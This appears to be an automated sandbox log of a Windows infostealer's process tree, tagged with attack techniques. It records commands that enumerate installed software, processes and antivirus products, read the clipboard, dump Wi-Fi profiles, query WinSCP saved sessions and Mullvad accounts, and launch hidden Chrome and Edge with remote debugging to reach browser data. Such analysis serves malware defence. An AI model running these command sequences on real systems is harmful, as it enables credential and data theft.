C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Select-Object InstanceId,Name,Manufacturer | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance Win32_VideoController | Select-Object CurrentHorizontalResolution,CurrentVerticalResolution,CurrentBitsPerPixel | ConvertTo-Json""3⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-CimInstance Win32_VideoController | Select-Object CurrentHorizontalResolution,CurrentVerticalResolution,CurrentBitsPerPixel | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""3⤵PID:628
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"4⤵PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""3⤵PID:6136
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"4⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""3⤵PID:3176
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"4⤵PID:1852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""3⤵PID:2872
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"4⤵PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""3⤵PID:5828
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"4⤵PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""3⤵PID:4896
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"4⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""3⤵PID:5168
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"4⤵PID:4476
-
-
-
C:\Windows\system32\taskkill.exetaskkill /PID 5168 /F3⤵
- Kills process with taskkill
PID:2704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""3⤵PID:4900
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"4⤵PID:5348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""3⤵PID:4856
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"4⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""3⤵PID:5820
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"4⤵PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""3⤵PID:2644
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"4⤵PID:5356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""3⤵PID:4844
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"4⤵PID:5876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""3⤵PID:1728
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"4⤵PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)""3⤵PID:2296
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)"4⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""3⤵PID:3444
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"4⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""3⤵PID:5208
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"4⤵PID:3288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""3⤵PID:4612
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"4⤵PID:5264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""3⤵PID:2688
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"4⤵PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""3⤵PID:3644
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"4⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""3⤵PID:5284
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"4⤵PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""3⤵PID:4876
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"4⤵PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""3⤵PID:2856
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"4⤵PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""3⤵PID:5136
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"4⤵PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""3⤵PID:1424
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"4⤵PID:5140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""3⤵PID:2300
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"4⤵PID:5232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""3⤵PID:3096
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"4⤵PID:5128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""3⤵PID:5056
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"4⤵PID:1656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""3⤵PID:4288
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"4⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""3⤵PID:1828
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"4⤵PID:4180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""3⤵PID:4328
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"4⤵PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""3⤵PID:3348
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"4⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""3⤵PID:2328
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"4⤵PID:2964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""3⤵PID:2992
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"4⤵PID:5756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""3⤵PID:1256
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"4⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B3CC37E-0C10-4698-8297-73D8073E1AB8}""3⤵PID:4772
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B3CC37E-0C10-4698-8297-73D8073E1AB8}"4⤵PID:5740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""3⤵PID:5716
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"4⤵PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""3⤵PID:5392
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"4⤵PID:944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""3⤵PID:756
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"4⤵PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""3⤵PID:1000
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"4⤵PID:1260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""3⤵PID:5712
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"4⤵PID:1296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""3⤵PID:4972
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"4⤵PID:5376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""3⤵PID:5348
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"4⤵PID:3692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""3⤵PID:4888
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"4⤵PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""3⤵PID:1620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"4⤵PID:5960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""3⤵PID:5684
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"4⤵PID:5408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""3⤵PID:5948
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"4⤵PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\lSPI8KKQcz4l_tezmp.ps1""3⤵PID:1460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\lSPI8KKQcz4l_tezmp.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"3⤵PID:5320
-
C:\Windows\system32\tasklist.exetasklist /FO CSV /NH4⤵
- Enumerates processes with tasklist
PID:4620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "mullvad account get"3⤵PID:4840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp""3⤵PID:3432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2412 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""3⤵PID:2808
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"4⤵PID:5176
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-24003⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2300 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc2476dcf8,0x7ffc2476dd04,0x7ffc2476dd104⤵PID:2812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --string-annotations --field-trial-handle=1424,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2136 /prefetch:114⤵PID:984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2104,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2088 /prefetch:24⤵PID:4344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=fr --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2376 /prefetch:134⤵PID:5636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3196 /prefetch:14⤵
- Uses browser remote debugging
PID:2964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3240 /prefetch:14⤵
- Uses browser remote debugging
PID:5932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4076,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4088 /prefetch:94⤵
- Uses browser remote debugging
PID:5640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=fr --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4704,i,10708404758912970393,12225215573834424010,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4684 /prefetch:14⤵
- Uses browser remote debugging
PID:4932
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-24003⤵
- Uses browser remote debugging
- Drops file in Windows directory
